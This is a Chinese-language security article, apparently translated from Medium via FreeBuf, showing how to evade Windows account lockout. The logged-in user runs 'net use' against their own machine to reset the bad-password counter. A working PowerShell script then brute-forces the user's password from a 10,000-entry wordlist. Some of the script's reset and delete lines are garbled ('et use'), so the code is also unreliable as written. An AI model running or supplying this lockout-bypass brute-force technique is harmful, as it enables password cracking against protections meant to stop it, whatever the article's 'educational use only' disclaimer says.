*本文仅用于教育目的。 切勿在未授权的计算机上进行安全测试。

获取用户帐户密码有很多好方法，这只是另一种方式。 好的，让我们开始吧。核心思路是，用户想要爆破身份验证，他们就可以运行“net use \\％computername％/ u：％username％”命令，该命令可以重新要求身份验证并重置锁定计数。要想进行操作，您需要从Microsoft下载远程服务器管理工具安装该工具后，运行一小段powershell脚本以显示我的JoeUser帐户信息并锁定。

get-aduser -filter * -prop lastbadpasswordattempt, badpwdcount, lockedout | select name, lastbadpasswordattempt, badpwdcount,lockedout | format-table -auto

在我的本地策略中，您可以看到我在3次无效登录尝试后被锁定（我从Microsoft获得的默认安装值）。
接下来我将输入错误的密码，window将记录我的错误次数。
现在我将使用命令清除错误的密码尝试：“Net use \\％computername％/ u：％username％”注意我没有指定密码。 我已经以用户身份登录，它似乎使用当前用户的上下文进行身份验证，并清除了错误的密码计数！
现在我可以使用这种技术爆破密码。 唯一的缺点是我必须在每次设置后删除共享。 例如，现在我已经进行了共享设置，如果我尝试爆破密码，我会收到此消息
然而只需一条命令即可“Net Use /Delete \\%computername%”
正式测试，我使用Daniel Miesslers SecLists的前10000名密码列表来爆破。正确的密码也在里面。

$userVar = Get-ChildItem env:username
$uname = $userVar.Value
$computerVar = Get-ChildItem env:computername
$computerName = $computerVar.Value
$ErrorActionPreference = "Stop"
$hooray = "PasswordNotFoun"
$CurrentPath = "C:\Users\Public"
$FileName = "10-million-password-list-top-10000.txt"
$FName= "$CurrentPath\$FileName"
foreach($value in [System.IO.File]::ReadLines($Fname))
{
    $passAttempt = ('net use \\' + $computerName + ' "' + $value + '"' + '/u:' + $uname )
    try
    {
        Write-Output ("trying password " + $value)
        $output = Invoke-Expression $passAttempt | Out-Null
        $hooray = $value
        write-output ("FOUND the user password: " + $value)
        $reset = ('et use \\' + $computername + ' /u:'+ $uname )
        Invoke-Expression $reset | Out-Null
        $deleteShare = ('net use /delete \\' + $computername )
        Invoke-Expression $deleteShare | Out-Null
        break
    }
    catch
    {
        $reset = ('et use \\' + $computername + '/u:' + $uname )
        Invoke-Expression $reset | Out-Null
        $deleteShare = ('et use /delete \\'+ $computername )
        Invoke-Expression $deleteShare | Out-Null
    }
}
write-host "The Password is: "$hooray

成功爆破

*参考来源：medium，FB小编周大涛编译，转载请注明来自FreeBuf.COM